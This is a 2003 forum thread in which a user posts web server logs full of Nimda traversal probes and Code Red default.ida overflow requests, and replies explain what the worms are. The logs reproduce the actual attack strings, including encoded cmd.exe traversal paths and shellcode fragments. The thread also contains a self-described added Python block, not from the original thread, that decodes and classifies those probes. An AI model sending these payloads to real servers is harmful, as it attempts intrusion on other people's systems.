
Am I getting hacked?

Tanner

Diamond Member
200.54.171.210 - - [01/Mar/2003:01:10:38 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 330
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Those entries are on there pretty much every single day... It seems to constantly be someone on COX...

Anyhow... someone going for cmd.exe appears to be "trying" to hack me. I've got Apache set up w/ the secure settings (I can't even get my 0wn st00pid page up on my machine) 😀 So, I don't think that they're getting anything really... but what is up w/ the ..%c1%1c../ parts? I don't understand.

 
Looks reminiscent of Code Red. It's trying to exploit the buffer overflow and then run a command on your cmd.exe. Wonder what idiot still hasn't patched that bug (if that's it).
 
Here are the latest ones...I don't know what the long string of XXXXXXs are... what's THAT all about?

68.18.198.177 - - [18/Mar/2003:19:42:47 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339

68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

68.18.198.177 - - [18/Mar/2003:20:48:22 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.50.162.155 - - [18/Mar/2003:21:18:48 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.18.198.177 - - [18/Mar/2003:21:38:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

MAN those are long! WHAT the HECK would a server make of THAT stuff? 😕
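Neither question in the two posts above (what the `..%c1%1c../` pieces are, and what a server makes of the `default.ida?XXXX...%u9090` request) gets answered in the thread, so here is an added example, written for this page and not code from the thread: a small Python scanner that decodes the probes the way an unpatched IIS did and labels them. It assumes Common Log Format input; the sample lines are constructed, shortened copies of the entries quoted above, and the `OVERLONG` table and the category names in `classify()` are mine.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines modelled on the entries quoted in the thread (the
# default.ida payload is shortened; the real one carries ~200 X's and more %u words).
SAMPLE_LOG = """\
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.18.198.177 - - [18/Mar/2003:19:42:47 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 404 300
192.0.2.10 - - [18/Mar/2003:20:00:00 -0500] "GET /index.html HTTP/1.0" 200 1234
"""

# Common Log Format; the protocol token is optional because one quoted line lacks it.
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) (\S+)')

# Malformed or overlong UTF-8 byte pairs that unpatched IIS 4/5 turned into a path
# separator *after* its "..\" check (MS00-078); the pairs are the ones in the logs.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

def normalize_path(raw):
    """Decode as the vulnerable server did: percent-decode twice (MS01-026's
    'superfluous decode' takes %255c -> %5c -> '\\'), map the overlong pairs,
    then treat backslash as '/'."""
    b = unquote_to_bytes(unquote_to_bytes(raw))
    for bad, good in OVERLONG.items():
        b = b.replace(bad, good)
    return b.decode("latin-1").replace("\\", "/")

def classify(raw_path):
    """Name the probe family, or None for an ordinary request."""
    norm = normalize_path(raw_path).lower()
    if norm.startswith("/default.ida?") and "%u" in raw_path.lower():
        return "code-red .ida overflow"          # MS01-033
    if "cmd.exe" in norm or "root.exe" in norm:
        return "nimda traversal/cmd probe"       # MS00-078, MS01-026, Code Red II root.exe
    return None

def scan_log(text):
    """Return (ip, status, category, decoded path) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status, _size = m.groups()
        cat = classify(path)
        if cat:
            hits.append((ip, int(status), cat, normalize_path(path)))
    return hits
```

The sixteen-URL burst of cmd.exe/root.exe requests is the Nimda worm's scan list and the default.ida line is the Code Red .ida overflow; both target IIS only, so an Apache host answering 404 is not affected, and blocking or ignoring the source is the whole response.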
 
Let me say this again, more clearly: YOU'RE NOT GETTING HACKED. READ SECURITY BBS AND ADVISORIES BEFORE BLINDLY POSTING!!! AND FOR GOD'S SAKE LISTEN WHEN PEOPLE TALK TO YOU!
 
Originally posted by: narzy
Let me say this again, more clearly: YOU'RE NOT GETTING HACKED. READ SECURITY BBS AND ADVISORIES BEFORE BLINDLY POSTING!!! AND FOR GOD'S SAKE LISTEN WHEN PEOPLE TALK TO YOU!

Did he argue after you said that the first time? 😕
 
I'm pretty sure it's Code Red or a similar IIS worm. The long strings of X's are attempting to overflow the buffer and then execute code to compromise your system. If you're seeing that and you have run the latest antivirus software and are fully patched (or aren't running IIS) odds are you're just getting hit by it, not infected.

Block the port/IP that it is coming from on your router.
 
Well,

I've got Norton AV runnin' w/ the latest update.
I'm runnin' Apache... who in their right mind would run IIS? OUCH! 😀

😕
 